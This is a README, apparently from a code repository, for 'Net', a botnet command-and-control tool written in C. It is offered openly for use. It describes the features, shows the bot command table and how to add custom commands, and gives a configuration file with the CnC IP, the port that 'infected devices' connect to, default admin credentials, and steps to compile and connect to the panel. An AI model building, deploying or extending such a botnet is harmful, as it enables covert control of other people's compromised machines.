Net icon indicating copy to clipboard operation
Net copied to clipboard

A fast, lightweight botnet written in pure C.

Net - A botnet written in C.

Net is a very easy-to-use botnet that has several options while being highly customizable.



Feature Description
Multi-threading The server works in the background while the CLI is running.
Sending data You can send data to all the connected devices.
Clean interface Net has an easy-to-use clean CLI that is easy to navigate.
Dynamic Commands Net makes it very easy for you to add your own commands.

Dynamic Commands & Custom Commands

To add commands, simply create your function and then add the custom command and function to botnet_commands as shown below.

struct function botnet_commands[] = {
    {"custom_command", custom_function}, // <- The custom command goes right here! Make sure you have already written your function!
    {"?", help_menu},
    {"help", help_menu},
    {"bots", bot_count},
    {"list", bot_count},
    {"server", cnc_details},
    {"banner", display_banner},
    {"clear", clear_screen},
    {"cls", clear_screen},


To edit the configuration for the botnet, head over to includes/config/config.h.

#pragma once

    *    includes/config/config.h
    *    Date: 11/09/21
    *    Author: 0x1CA3

#define USERNAME "admin"
#define PASSWORD "password"
#define MAX_DEVICES 99999
#define CNC_IP ""
#define CNC_PORT 1337 /* This is the port your bots/infected devices will use to connect */
#define ADMIN_PORT 1233 /* This is the port you will use when connecting to the admin panel */					       

Installation & Setup

gcc -o net net.c -lpthread
Open up a new terminal window
Connect to the CnC | Example: nc 3434
Login with the default credentials [admin:password]

Update Log

[11/9/21] - Removed 'adb_check' option
[11/9/21] - Remade 'Net'
[9/14/21] - Created 'Net'




Contributions 🎉

All contributions are accepted, simply open an Issue / Pull request.